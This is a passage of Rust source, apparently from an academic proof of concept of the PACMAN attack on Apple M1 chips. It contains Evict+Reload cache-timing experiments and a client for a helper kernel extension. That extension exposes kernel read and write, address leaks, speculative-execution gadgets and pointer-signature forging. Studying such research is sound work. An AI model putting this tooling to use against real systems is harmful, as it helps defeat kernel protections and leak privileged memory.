=> panic!("Couldn't connect to PacmanKit"), 39 | }; 40 | 41 | let mut kernel_mmap_va = match handle.kernel_mmap() { 42 | Ok(v) => v, 43 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 44 | }; 45 | 46 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 47 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 48 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 49 | println!("Generating eviction set to match address with L2 set {}...", target_set); 50 | 51 | let evset = data_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 52 | println!("Found {} conflicts.", evset.len()); 53 | 54 | // Evict + Reload 55 | for num_test_addrs in 0..TRIALS { 56 | let mut averages = [0; NUM_RETRIALS]; 57 | let mut 
trial_accumulator = 0; 58 | for retrial_idx in 0..NUM_RETRIALS { 59 | // Chose an eviction set of size `num_test_addrs`... 60 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 61 | let evict_me = chosen.pop().unwrap(); 62 | 63 | // ...and access them in a random order 64 | // Don't do pointer chasing as the DMP can predict that 65 | // Instead just index the vector randomly 66 | let mut indexes : Vec = (0..chosen.len()).collect(); 67 | indexes.shuffle(&mut thread_rng()); 68 | 69 | let mut measurements = [0; TRIAL_REPEAT]; 70 | 71 | for cur_trial in 0..TRIAL_REPEAT+1 { 72 | let init_read_time = timer::time_access(evict_me); 73 | 74 | for i in 0..num_test_addrs { 75 | timer::time_access(chosen[indexes[i]]); 76 | } 77 | 78 | let reload_time = timer::time_access(evict_me); 79 | 80 | // Skip the very first trial as its latency is always way too high 81 | if cur_trial != 0 { 82 | measurements[cur_trial - 1] = reload_time; 83 | } 84 | } 85 | 86 | let mut average : u64 = 0; 87 | for i in 0..TRIAL_REPEAT { 88 | average += measurements[i]; 89 | } 90 | average /= (TRIAL_REPEAT as u64); 91 | trial_accumulator += average; 92 | averages[retrial_idx] = average; 93 | } 94 | print!("'{}': [", num_test_addrs); 95 | 96 | for i in averages { 97 | print!("{},", i); 98 | } 99 | 100 | println!("],"); 101 | } 102 | } 103 | 104 | /** 105 | * Evict+Reload for instruction accesses. 
106 | * 107 | * TLDR: 108 | * ``` 109 | * for num_test_addrs in range(TRIALS): 110 | * for retrial_idx in range(NUM_RETRIALS): 111 | * chosen = evset.sample(num_test_addrs) 112 | * 113 | * for cur_trial in range(TRIAL_REPEAT): 114 | * execute test addr 115 | * execute chosen set in random order 116 | * execute (again) test addr 117 | * record execute latency 118 | * 119 | * print(average(execute latencies for a given trial size)) 120 | * ``` 121 | */ 122 | pub unsafe fn inst_evict_reload(shared_mem: &mut [u8]) { 123 | let handle = match PacmanKitConnection::init() { 124 | Some(v) => v, 125 | None => panic!("Couldn't connect to PacmanKit"), 126 | }; 127 | 128 | let mut kernel_mmap_va = match handle.kernel_mmap() { 129 | Ok(v) => v, 130 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 131 | }; 132 | 133 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 134 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 135 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 136 | println!("Generating eviction set to match address with L2 set {}...", target_set); 137 | 138 | let evset = inst_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 139 | println!("Found {} conflicts.", evset.len()); 140 | 141 | // Evict + Reload 142 | for num_test_addrs in 0..TRIALS { 143 | let mut averages = [0; NUM_RETRIALS]; 144 | let mut trial_accumulator = 0; 145 | for retrial_idx in 0..NUM_RETRIALS { 146 | // init_memory(shared_mem); 147 | 148 | // Chose an eviction set of size `num_test_addrs`... 
149 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 150 | let evict_me = chosen.pop().unwrap(); 151 | 152 | // ...and access them in a random order 153 | // Don't do pointer chasing as the DMP can predict that 154 | // Instead just index the vector randomly 155 | let mut indexes : Vec = (0..chosen.len()).collect(); 156 | indexes.shuffle(&mut thread_rng()); 157 | 158 | let mut measurements = [0; TRIAL_REPEAT]; 159 | 160 | for cur_trial in 0..TRIAL_REPEAT+1 { 161 | let init_read_time = timer::time_exec(evict_me); 162 | 163 | for i in 0..num_test_addrs { 164 | timer::time_exec(chosen[indexes[i]]); 165 | } 166 | 167 | let reload_time = timer::time_exec(evict_me); 168 | 169 | // Skip the very first trial as its latency is always way too high 170 | if cur_trial != 0 { 171 | measurements[cur_trial - 1] = reload_time; 172 | } 173 | } 174 | 175 | let mut average : u64 = 0; 176 | for i in 0..TRIAL_REPEAT { 177 | average += measurements[i]; 178 | } 179 | average /= (TRIAL_REPEAT as u64); 180 | trial_accumulator += average; 181 | averages[retrial_idx] = average; 182 | } 183 | print!("'{}': [", num_test_addrs); 184 | 185 | for i in averages { 186 | print!("{},", i); 187 | } 188 | 189 | println!("],"); 190 | } 191 | } 192 | 193 | /** 194 | * Evict+Reload for data accesses in the kernel. 195 | * 196 | * Keep this in sync with `data_evict_reload`! 
197 | */ 198 | pub unsafe fn data_evict_reload_kernel(shared_mem: &mut [u8]) { 199 | let handle = match PacmanKitConnection::init() { 200 | Some(v) => v, 201 | None => panic!("Couldn't connect to PacmanKit"), 202 | }; 203 | 204 | let kernel_target_va = handle.leak_limit_location().unwrap(); 205 | // let kernel_target_va = handle.kernel_mmap().unwrap(); 206 | let kernel_target_pa = handle.kernel_virt_to_phys(kernel_target_va).unwrap(); 207 | 208 | let target_set = cache::get_cache_set_m1(kernel_target_pa); 209 | println!("Kernel target VA: 0x{:X}\n PA: 0x{:X}\n Contents: 0x{:X}\n", kernel_target_va, kernel_target_pa, handle.kernel_read(kernel_target_va).unwrap()); 210 | println!("Generating eviction set to match address with L2 set {}...", target_set); 211 | 212 | let evset = data_pevset(kernel_target_va, kernel_target_pa, shared_mem); 213 | println!("Found {} conflicts.", evset.len()); 214 | 215 | // Evict + Reload 216 | for num_test_addrs in 0..evset.len() { 217 | let mut averages = [0; NUM_RETRIALS]; 218 | let mut trial_accumulator = 0; 219 | for retrial_idx in 0..NUM_RETRIALS { 220 | // Chose an eviction set of size `num_test_addrs`... 221 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 222 | 223 | // For the user mode version, we use something from the evset as our reload target 224 | // Since we're using the kernel, we can ignore this popped value 225 | // Keep it here to ensure the index math lines up with the user version of this method, though. 
226 | let ignore_this = chosen.pop().unwrap(); 227 | 228 | // ...and access them in a random order 229 | // Don't do pointer chasing as the DMP can predict that 230 | // Instead just index the vector randomly 231 | let mut indexes : Vec = (0..chosen.len()).collect(); 232 | indexes.shuffle(&mut thread_rng()); 233 | 234 | let mut measurements = [0; TRIAL_REPEAT]; 235 | 236 | for cur_trial in 0..TRIAL_REPEAT+1 { 237 | let init_read_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 238 | 239 | for i in 0..num_test_addrs { 240 | timer::time_access(chosen[indexes[i]]); 241 | } 242 | 243 | let reload_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 244 | 245 | // Skip the very first trial as its latency is always way too high 246 | if cur_trial != 0 { 247 | measurements[cur_trial - 1] = reload_time; 248 | } 249 | } 250 | 251 | let mut average : u64 = 0; 252 | for i in 0..TRIAL_REPEAT { 253 | average += measurements[i]; 254 | } 255 | average /= (TRIAL_REPEAT as u64); 256 | trial_accumulator += average; 257 | averages[retrial_idx] = average; 258 | } 259 | print!("'{}': [", num_test_addrs); 260 | 261 | for i in averages { 262 | print!("{},", i); 263 | } 264 | 265 | println!("],"); 266 | } 267 | } 268 | 269 | /** 270 | * Evict+Reload for instruction accesses. 271 | * 272 | * Keep this in sync with `inst_evict_reload`! 
273 | */ 274 | pub unsafe fn inst_evict_reload_kernel(shared_mem: &mut [u8]) { 275 | let handle = match PacmanKitConnection::init() { 276 | Some(v) => v, 277 | None => panic!("Couldn't connect to PacmanKit"), 278 | }; 279 | 280 | let kernel_method_va = handle.leak_retpoline().unwrap() | PAC_BITMASK; // + 0x30C0; 281 | // let kernel_method_va = handle.get_kernel_base().unwrap() + attacks::pacman::INST_TARGET_OFFSET; 282 | 283 | let kernel_method_pa = handle.kernel_virt_to_phys(kernel_method_va).unwrap(); 284 | let target_set = cache::get_cache_set_m1(kernel_method_pa); 285 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_method_va, kernel_method_pa); 286 | println!("Generating eviction set to match address with L2 set {}...", target_set); 287 | 288 | let evset = inst_pevset(kernel_method_va, kernel_method_pa, shared_mem); 289 | println!("Found {} conflicts.", evset.len()); 290 | 291 | // Evict + Reload 292 | for num_test_addrs in 0..TRIALS { 293 | let mut averages = [0; NUM_RETRIALS]; 294 | let mut trial_accumulator = 0; 295 | for retrial_idx in 0..NUM_RETRIALS { 296 | // init_memory(shared_mem); 297 | 298 | // Chose an eviction set of size `num_test_addrs`... 299 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 300 | 301 | // For the user mode version, we use something from the evset as our reload target 302 | // Since we're using the kernel, we can ignore this popped value 303 | // Keep it here to ensure the index math lines up with the user version of this method, though. 
304 | let ignore_this = chosen.pop().unwrap(); 305 | 306 | // ...and access them in a random order 307 | // Don't do pointer chasing as the DMP can predict that 308 | // Instead just index the vector randomly 309 | let mut indexes : Vec = (0..chosen.len()).collect(); 310 | indexes.shuffle(&mut thread_rng()); 311 | 312 | let mut measurements = [0; TRIAL_REPEAT]; 313 | 314 | for cur_trial in 0..TRIAL_REPEAT+1 { 315 | let init_read_time = handle.kernel_exec_for_timing(kernel_method_va, true).unwrap(); 316 | 317 | for i in 0..num_test_addrs { 318 | timer::time_exec(chosen[indexes[i]]); 319 | } 320 | 321 | let reload_time = handle.kernel_exec_for_timing(kernel_method_va, true).unwrap(); 322 | 323 | // Skip the very first trial as its latency is always way too high 324 | if cur_trial != 0 { 325 | measurements[cur_trial - 1] = reload_time; 326 | } 327 | } 328 | 329 | let mut average : u64 = 0; 330 | for i in 0..TRIAL_REPEAT { 331 | average += measurements[i]; 332 | } 333 | average /= (TRIAL_REPEAT as u64); 334 | trial_accumulator += average; 335 | averages[retrial_idx] = average; 336 | } 337 | print!("'{}': [", num_test_addrs); 338 | 339 | for i in averages { 340 | print!("{},", i); 341 | } 342 | 343 | println!("],"); 344 | } 345 | } 346 | 347 | /** 348 | * Evict+Reload for data accesses in the kernel using an eviction set also in the kernel. 349 | * 350 | * This is mostly useful for testing. 351 | * 352 | * Keep this in sync with `data_evict_reload`! 
353 | */ 354 | pub unsafe fn data_evict_reload_kernel_kernel_evset(shared_mem: &mut [u8]) { 355 | let handle = match PacmanKitConnection::init() { 356 | Some(v) => v, 357 | None => panic!("Couldn't connect to PacmanKit"), 358 | }; 359 | 360 | let kernel_limit_addr = handle.leak_limit_location().unwrap(); 361 | let kernel_mmap_addr = handle.kernel_mmap().unwrap(); 362 | let kernel_target_va = kernel_limit_addr; 363 | // let kernel_target_va = kernel_mmap_addr; 364 | let kernel_target_pa = handle.kernel_virt_to_phys(kernel_target_va).unwrap(); 365 | 366 | let target_set = cache::get_cache_set_m1(kernel_target_pa); 367 | println!("Kernel target VA: 0x{:X}\n PA: 0x{:X}\n Contents: 0x{:X}\n", kernel_target_va, kernel_target_pa, handle.kernel_read(kernel_target_va).unwrap()); 368 | println!("Generating eviction set to match address with L2 set {}...", target_set); 369 | 370 | // let evset = data_pevset(kernel_target_va, kernel_target_pa, shared_mem); 371 | let evset = data_kpevset(kernel_target_va, kernel_target_pa, kernel_mmap_addr, 0xC000 * cache::PAGE_SIZE); 372 | println!("Found {} conflicts.", evset.len()); 373 | 374 | for i in 0..evset.len() { 375 | if i > 100 {break;} 376 | let print_va = evset[i]; 377 | println!("0x{:X}\t=>\t0x{:X}", print_va, handle.kernel_virt_to_phys(print_va).unwrap()); 378 | } 379 | 380 | // Evict + Reload 381 | for num_test_addrs in 0..evset.len() { 382 | let mut averages = [0; NUM_RETRIALS]; 383 | let mut trial_accumulator = 0; 384 | for retrial_idx in 0..NUM_RETRIALS { 385 | // Chose an eviction set of size `num_test_addrs`... 386 | let mut chosen : Vec = evset.choose_multiple(&mut rand::thread_rng(), num_test_addrs + 1).into_iter().cloned().collect(); 387 | 388 | // For the user mode version, we use something from the evset as our reload target 389 | // Since we're using the kernel, we can ignore this popped value 390 | // Keep it here to ensure the index math lines up with the user version of this method, though. 
391 | let ignore_this = chosen.pop().unwrap(); 392 | 393 | // ...and access them in a random order 394 | // Don't do pointer chasing as the DMP can predict that 395 | // Instead just index the vector randomly 396 | let mut indexes : Vec = (0..chosen.len()).collect(); 397 | indexes.shuffle(&mut thread_rng()); 398 | 399 | let mut measurements = [0; TRIAL_REPEAT]; 400 | 401 | for cur_trial in 0..TRIAL_REPEAT+1 { 402 | let init_read_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 403 | 404 | for i in 0..num_test_addrs { 405 | // timer::time_access(chosen[indexes[i]]); 406 | handle.kernel_read_for_timing(chosen[indexes[i]], true).unwrap(); 407 | } 408 | 409 | // Flush the entire cache: 410 | // init_memory(shared_mem); 411 | // flush_cache(shared_mem); 412 | 413 | let reload_time = handle.kernel_read_for_timing(kernel_target_va, true).unwrap(); 414 | 415 | // Skip the very first trial as its latency is always way too high 416 | if cur_trial != 0 { 417 | measurements[cur_trial - 1] = reload_time; 418 | } 419 | } 420 | 421 | let mut average : u64 = 0; 422 | for i in 0..TRIAL_REPEAT { 423 | average += measurements[i]; 424 | } 425 | average /= (TRIAL_REPEAT as u64); 426 | trial_accumulator += average; 427 | averages[retrial_idx] = average; 428 | } 429 | print!("'{}': [", num_test_addrs); 430 | 431 | for i in averages { 432 | print!("{},", i); 433 | } 434 | 435 | println!("],"); 436 | } 437 | } 438 | -------------------------------------------------------------------------------- /src/pacmankit.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Shared information between the user attack and the PacmanKit kext. 
3 | */ 4 | use std::ffi::{CStr, CString}; 5 | use crate::iokit::*; 6 | use crate::mach::*; 7 | use crate::timer; 8 | 9 | /// Offset in bytes within a PacmanUser IOUserClient to the helper field 10 | pub const PACMANKIT_TO_HELPER : u64 = 0xE0; 11 | 12 | /** 13 | * The operations supported by the PacmanKit kext. 14 | * 15 | * Each of these is an ::externalMethod selector. 16 | */ 17 | #[repr(u32)] 18 | pub enum PacmanKitOp { 19 | KernelBase = 0x00, 20 | Read = 0x01, 21 | Write = 0x02, 22 | KernelVirt2Phys = 0x03, 23 | UserVirt2Phys = 0x04, 24 | IOUserClientLeak = 0x05, 25 | GimmeMemory = 0x06, 26 | FreeMemory = 0x07, 27 | TellMeRegs = 0x08, 28 | ReadForTiming = 0x09, 29 | ExecForTiming = 0x0A, 30 | LeakMethod = 0x0B, 31 | ReadForSpectre = 0x0C, 32 | ExecForSpectre = 0x0D, 33 | CallServiceRoutine= 0x0E, 34 | ForgeSignData = 0x0F, 35 | ForgeAuthData = 0x10, 36 | ForgeSignInst = 0x11, 37 | ForgeAuthInst = 0x12, 38 | LeakCurProc = 0x13, 39 | } 40 | 41 | /** 42 | * An object representing a connection to the PacmanKit IOUserClient in the PacmanKit kext. 43 | * 44 | * This can be used to run all the operations provided by the PacmanKit kext. 45 | */ 46 | pub struct PacmanKitConnection(IOConnect, IOService); 47 | 48 | impl PacmanKitConnection { 49 | /** 50 | * Create a new PacmanKitConnection. 51 | * This opens a new IOUserClient and may fail. 52 | * 53 | * # Return Value 54 | * Returns the `kern_return_t` error on failure, a valid PacmanKitConnection on success. 55 | */ 56 | pub unsafe fn init() -> Option { 57 | let mut kret : KernReturn; 58 | let mut name : IOName = [0;128]; 59 | let mut handle : IOConnect = 0; 60 | let service_name = CString::new("PacmanKit").unwrap(); 61 | let serv = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching(service_name.as_ptr())); 62 | if IO_OBJECT_NULL == serv { 63 | println!("Couldn't find PacmanKit. 
Did you remember to install it?"); 64 | return None; 65 | } 66 | 67 | IORegistryEntryGetName(serv, &mut name); 68 | kret = IOServiceOpen(serv, mach_task_self(), 0, &mut handle); 69 | if KERN_SUCCESS != kret { 70 | println!("Couldn't connect to IOService {:?} (error {:?}", CStr::from_ptr(&name as *const _), CStr::from_ptr(mach_error_string(kret))); 71 | IOObjectRelease(serv); 72 | return None; 73 | } 74 | 75 | return Some(Self( 76 | handle, 77 | serv 78 | )); 79 | } 80 | 81 | /** 82 | * Returns the kernel base address (pointer to the macho header of the kernelcache). 83 | */ 84 | pub unsafe fn get_kernel_base(&self) -> Result { 85 | let mut kaslr_base = 0; 86 | let mut output_cnt = 1; 87 | let kret = IOConnectCallScalarMethod( 88 | self.0, 89 | PacmanKitOp::KernelBase as u32, 90 | core::ptr::null(), 91 | 0, 92 | &mut kaslr_base, 93 | &mut output_cnt 94 | ); 95 | 96 | if kret != KERN_SUCCESS { 97 | println!("Couldn't leak kernel base! (error {:?})", CStr::from_ptr(mach_error_string(kret))); 98 | return Err(kret); 99 | } 100 | 101 | return Ok(kaslr_base); 102 | } 103 | 104 | /** 105 | * Read a u64 from kernel virtual memory. 106 | */ 107 | pub unsafe fn kernel_read(&self, addr: u64) -> Result { 108 | let mut output_cnt = 1; 109 | let mut read_out = 0; 110 | let kret = IOConnectCallScalarMethod( 111 | self.0, 112 | PacmanKitOp::Read as u32, 113 | &addr, 114 | 1, 115 | &mut read_out, 116 | &mut output_cnt 117 | ); 118 | 119 | if KERN_SUCCESS != kret { 120 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 121 | return Err(kret); 122 | } 123 | 124 | return Ok(read_out); 125 | } 126 | 127 | /** 128 | * Write a u64 into kernel memory. 
129 | */ 130 | pub unsafe fn kernel_write(&self, addr: u64, val: u64) -> Result<(), KernReturn> { 131 | let args : [u64; 2] = [addr, val]; 132 | let kret = IOConnectCallScalarMethod( 133 | self.0, 134 | PacmanKitOp::Write as u32, 135 | args.as_ptr(), 136 | 2, 137 | core::ptr::null_mut(), 138 | core::ptr::null_mut() 139 | ); 140 | 141 | if KERN_SUCCESS != kret { 142 | println!("Couldn't write to kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 143 | return Err(kret); 144 | } 145 | 146 | return Ok(()); 147 | } 148 | 149 | /** 150 | * Translate a kernel virtual address to its physical address. 151 | */ 152 | pub unsafe fn kernel_virt_to_phys(&self, addr: u64) -> Result { 153 | let mut output_cnt = 1; 154 | let mut translate_out = 0; 155 | let kret = IOConnectCallScalarMethod( 156 | self.0, 157 | PacmanKitOp::KernelVirt2Phys as u32, 158 | &addr, 159 | 1, 160 | &mut translate_out, 161 | &mut output_cnt 162 | ); 163 | 164 | if KERN_SUCCESS != kret { 165 | println!("Couldn't translate kernel address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 166 | return Err(kret); 167 | } 168 | 169 | return Ok(translate_out); 170 | } 171 | 172 | /** 173 | * Translate a user virtual address to its physical address. 174 | */ 175 | pub unsafe fn user_virt_to_phys(&self, addr: u64) -> Result { 176 | let mut output_cnt = 1; 177 | let mut translate_out = 0; 178 | let kret = IOConnectCallScalarMethod( 179 | self.0, 180 | PacmanKitOp::UserVirt2Phys as u32, 181 | &addr, 182 | 1, 183 | &mut translate_out, 184 | &mut output_cnt 185 | ); 186 | 187 | if KERN_SUCCESS != kret { 188 | println!("Couldn't translate user address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 189 | return Err(kret); 190 | } 191 | 192 | return Ok(translate_out); 193 | } 194 | 195 | /** 196 | * Returns a pointer to this IOUserClient in the kernel. 
197 | */ 198 | pub unsafe fn get_handle_loc(&self) -> Result { 199 | let mut handle_loc = 0; 200 | let mut output_cnt = 1; 201 | let kret = IOConnectCallScalarMethod( 202 | self.0, 203 | PacmanKitOp::IOUserClientLeak as u32, 204 | core::ptr::null(), 205 | 0, 206 | &mut handle_loc, 207 | &mut output_cnt 208 | ); 209 | 210 | if KERN_SUCCESS != kret { 211 | println!("Couldn't get IOConnect virtual address (error {:?})", CStr::from_ptr(mach_error_string(kret))); 212 | return Err(kret); 213 | } 214 | 215 | return Ok(handle_loc); 216 | } 217 | 218 | /** 219 | * Returns a pointer to a kernel memory region mmap'ed by IOMallocAligned to a page size. 220 | */ 221 | pub unsafe fn kernel_mmap(&self) -> Result { 222 | let mut mmap_ptr = 0; 223 | let mut output_cnt = 1; 224 | let kret = IOConnectCallScalarMethod( 225 | self.0, 226 | PacmanKitOp::GimmeMemory as u32, 227 | core::ptr::null(), 228 | 0, 229 | &mut mmap_ptr, 230 | &mut output_cnt 231 | ); 232 | 233 | if KERN_SUCCESS != kret { 234 | println!("Couldn't get kernel mmap (error {:?})", CStr::from_ptr(mach_error_string(kret))); 235 | return Err(kret); 236 | } 237 | 238 | return Ok(mmap_ptr); 239 | } 240 | 241 | /** 242 | * Frees memory allocated by kernel_mmap. 
243 | */ 244 | pub unsafe fn kernel_free(&self) -> Result<(), KernReturn> { 245 | let kret = IOConnectCallScalarMethod( 246 | self.0, 247 | PacmanKitOp::FreeMemory as u32, 248 | core::ptr::null(), 249 | 0, 250 | core::ptr::null_mut(), 251 | core::ptr::null_mut() 252 | ); 253 | 254 | if KERN_SUCCESS != kret { 255 | println!("Couldn't get kernel mmap (error {:?})", CStr::from_ptr(mach_error_string(kret))); 256 | return Err(kret); 257 | } 258 | 259 | return Ok(()); 260 | } 261 | 262 | pub unsafe fn list_timer_regs(&self) { 263 | let mut rval : [u64; 2] = [0, 0]; 264 | let mut num_args : u32 = 2; 265 | let kret = IOConnectCallScalarMethod( 266 | self.0, 267 | PacmanKitOp::TellMeRegs as u32, 268 | core::ptr::null(), 269 | 0, 270 | rval.as_mut_ptr(), 271 | &mut num_args as *mut _, 272 | ); 273 | 274 | if KERN_SUCCESS != kret { 275 | println!("Couldn't read timer MSRs (error {:?})", CStr::from_ptr(mach_error_string(kret))); 276 | return; 277 | } 278 | 279 | println!("PMCR0 is 0x{:X}", rval[0]); 280 | println!("CNTKCTL_EL1 is 0x{:X}", rval[1]); 281 | 282 | return; 283 | } 284 | 285 | /** 286 | * Read a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 287 | * This *CAN* panic the kernel! 288 | * 289 | * # Arguments 290 | * * `addr`: A kernel address to load 291 | * * `do_it`: Should the load actually run? 292 | * 293 | * # Return Value 294 | * Returns the number of cycles taken if `do_it` was true. Else, returns an undefined value. 
295 | */ 296 | pub unsafe fn kernel_read_for_timing(&self, addr: u64, do_it: bool) -> Result { 297 | let mut output_cnt = 1; 298 | let mut read_out = 0; 299 | let args : [u64; 2] = [addr, do_it as u64]; 300 | let kret = IOConnectCallScalarMethod( 301 | self.0, 302 | PacmanKitOp::ReadForTiming as u32, 303 | args.as_ptr(), 304 | 2, 305 | &mut read_out, 306 | &mut output_cnt 307 | ); 308 | 309 | if KERN_SUCCESS != kret { 310 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 311 | return Err(kret); 312 | } 313 | 314 | return Ok(read_out - timer::TIMER_OVERHEAD_PCORE); 315 | } 316 | 317 | /** 318 | * Exec a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 319 | * This *CAN* panic the kernel! 320 | * 321 | * # Arguments 322 | * * `addr`: A kernel address to exec 323 | * * `do_it`: Should the call actually run? 324 | * 325 | * # Return Value 326 | * Returns the number of cycles taken if `do_it` was true. Else, returns an undefined value. 327 | */ 328 | pub unsafe fn kernel_exec_for_timing(&self, addr: u64, do_it: bool) -> Result { 329 | let mut output_cnt = 1; 330 | let mut read_out = 0; 331 | let args : [u64; 2] = [addr, do_it as u64]; 332 | let kret = IOConnectCallScalarMethod( 333 | self.0, 334 | PacmanKitOp::ExecForTiming as u32, 335 | args.as_ptr(), 336 | 2, 337 | &mut read_out, 338 | &mut output_cnt 339 | ); 340 | 341 | if KERN_SUCCESS != kret { 342 | println!("Couldn't exec from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 343 | return Err(kret); 344 | } 345 | 346 | return Ok(read_out - timer::TIMER_OVERHEAD_PCORE); 347 | } 348 | 349 | /** 350 | * Returns a pointer to a kernel method that just runs `ret`. 
351 | */ 352 | pub unsafe fn leak_retpoline(&self) -> Result { 353 | let mut method_leak_ptr : [u64; 3] = [0; 3]; 354 | let mut output_cnt = 3; 355 | let kret = IOConnectCallScalarMethod( 356 | self.0, 357 | PacmanKitOp::LeakMethod as u32, 358 | core::ptr::null(), 359 | 0, 360 | method_leak_ptr.as_mut_ptr(), 361 | &mut output_cnt 362 | ); 363 | 364 | if KERN_SUCCESS != kret { 365 | println!("Couldn't get reveal address of a kernel method (error {:?})", CStr::from_ptr(mach_error_string(kret))); 366 | return Err(kret); 367 | } 368 | 369 | return Ok(method_leak_ptr[0]); 370 | } 371 | 372 | /** 373 | * Returns a pointer to the `LIMIT` variable in the PacmanKit kext. 374 | */ 375 | pub unsafe fn leak_limit_location(&self) -> Result { 376 | let mut method_leak_ptr : [u64; 3] = [0; 3]; 377 | let mut output_cnt = 3; 378 | let kret = IOConnectCallScalarMethod( 379 | self.0, 380 | PacmanKitOp::LeakMethod as u32, 381 | core::ptr::null(), 382 | 0, 383 | method_leak_ptr.as_mut_ptr(), 384 | &mut output_cnt 385 | ); 386 | 387 | if KERN_SUCCESS != kret { 388 | println!("Couldn't get reveal address of the kext limit (error {:?})", CStr::from_ptr(mach_error_string(kret))); 389 | return Err(kret); 390 | } 391 | 392 | return Ok(method_leak_ptr[1]); 393 | } 394 | 395 | /** 396 | * Returns a pointer to the win() method in the PacmanKit kext. 
397 | */ 398 | pub unsafe fn leak_win(&self) -> Result { 399 | panic!("This has been deprecated- use leak_retpoline to reveal a region full of `ret`s that can be used"); 400 | // let mut method_leak_ptr : [u64; 3] = [0; 3]; 401 | // let mut output_cnt = 3; 402 | // let kret = IOConnectCallScalarMethod( 403 | // self.0, 404 | // PacmanKitOp::LeakMethod as u32, 405 | // core::ptr::null(), 406 | // 0, 407 | // method_leak_ptr.as_mut_ptr(), 408 | // &mut output_cnt 409 | // ); 410 | 411 | // if KERN_SUCCESS != kret { 412 | // println!("Couldn't get reveal address of the kext limit (error {:?})", CStr::from_ptr(mach_error_string(kret))); 413 | // return Err(kret); 414 | // } 415 | 416 | // return Ok(method_leak_ptr[2]); 417 | } 418 | 419 | /** 420 | * Read a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 421 | * This *CAN* panic the kernel! 422 | * 423 | * This is very similar to kernel_read_for_timing except it features no synchronization 424 | * barriers (so speculation can cause the load to happen) and does not report any latencies. 425 | * 426 | * # Arguments 427 | * * `addr`: A kernel address to load 428 | * * `idx`: Index passed in to the 'bounds check' 429 | * 430 | * # Return Value 431 | * Returns Nothing. 432 | */ 433 | pub unsafe fn kernel_read_for_spectre(&self, addr: u64, idx: u64) -> Result<(), KernReturn> { 434 | let args : [u64; 2] = [addr, idx]; 435 | let kret = IOConnectCallScalarMethod( 436 | self.0, 437 | PacmanKitOp::ReadForSpectre as u32, 438 | args.as_ptr(), 439 | 2, 440 | core::ptr::null_mut(), 441 | core::ptr::null_mut(), 442 | ); 443 | 444 | if KERN_SUCCESS != kret { 445 | println!("Couldn't read from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 446 | return Err(kret); 447 | } 448 | 449 | return Ok(()); 450 | } 451 | 452 | /** 453 | * Exec a u64 from kernel virtual memory without any IOMemoryDescriptor calls. 454 | * This *CAN* panic the kernel! 
455 | * 456 | * This is very similar to kernel_exec_for_timing except it features no synchronization 457 | * barriers (so speculation can cause the load to happen) and does not report any latencies. 458 | * 459 | * # Arguments 460 | * * `addr`: A kernel address to exec 461 | * * `idx`: Index passed in to the 'bounds check' 462 | * 463 | * # Return Value 464 | * Returns Nothing. 465 | */ 466 | pub unsafe fn kernel_exec_for_spectre(&self, addr: u64, idx: u64) -> Result<(), KernReturn> { 467 | let args : [u64; 2] = [addr, idx]; 468 | let kret = IOConnectCallScalarMethod( 469 | self.0, 470 | PacmanKitOp::ExecForSpectre as u32, 471 | args.as_ptr(), 472 | 2, 473 | core::ptr::null_mut(), 474 | core::ptr::null_mut(), 475 | ); 476 | 477 | if KERN_SUCCESS != kret { 478 | println!("Couldn't exec from kernel memory (error {:?})", CStr::from_ptr(mach_error_string(kret))); 479 | return Err(kret); 480 | } 481 | 482 | return Ok(()); 483 | } 484 | 485 | pub unsafe fn call_service_routine(&self, arg1: u64, arg2: u64, arg3: u64, arg4: u64, arg5: u64, arg6: u64) -> Result { 486 | let args : [u64; 6] = [arg1, arg2, arg3, arg4, arg5, arg6]; 487 | let mut output_cnt = 1; 488 | let mut output_val = 0u64; 489 | 490 | let kret = IOConnectCallScalarMethod( 491 | self.0, 492 | PacmanKitOp::CallServiceRoutine as u32, 493 | args.as_ptr(), 494 | 6, 495 | &mut output_val, 496 | &mut output_cnt 497 | ); 498 | 499 | // Ignore errors... 500 | if KERN_SUCCESS != kret { 501 | // println!("Couldn't call service routine {}!", arg1); 502 | // return Err(kret); 503 | } 504 | 505 | return Ok(output_val); 506 | } 507 | 508 | /// Returns the correct PACDA signature from the kernel. This can ONLY be used for testing! 509 | /// The real attack will need to use brute force to find this. We only use this method to learn 510 | /// the ground truth for generating plots and tuning the algorithm. 
